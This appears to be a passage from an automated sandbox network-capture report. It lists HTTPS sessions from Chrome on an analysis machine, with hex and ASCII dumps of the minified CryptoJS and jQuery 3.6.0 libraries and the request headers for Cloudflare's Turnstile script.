                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC413INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                                                                                          Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65
                                                                                                                                                                                                                          Data Ascii: lobalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72
                                                                                                                                                                                                                          Data Ascii: l(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)tr
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b
                                                                                                                                                                                                                          Data Ascii: f t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31
                                                                                                                                                                                                                          Data Ascii: t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e
                                                                                                                                                                                                                          Data Ascii: (r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63
                                                                                                                                                                                                                          Data Ascii: .byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:func
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53
                                                                                                                                                                                                                          Data Ascii: At(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRS
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f
                                                                                                                                                                                                                          Data Ascii: in(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC1369INData Raw: 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30
                                                                                                                                                                                                                          Data Ascii: =C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          11192.168.2.1849792151.101.130.137443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:01 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                          Host: code.jquery.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Content-Length: 89501
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:02 GMT
                                                                                                                                                                                                                          Age: 2977593
                                                                                                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740070-EWR
                                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                                          X-Cache-Hits: 2774, 319
                                                                                                                                                                                                                          X-Timer: S1734456062.074792,VS0,VE0
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                          2024-12-17 17:21:02 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          12192.168.2.1849793104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:03 GMT
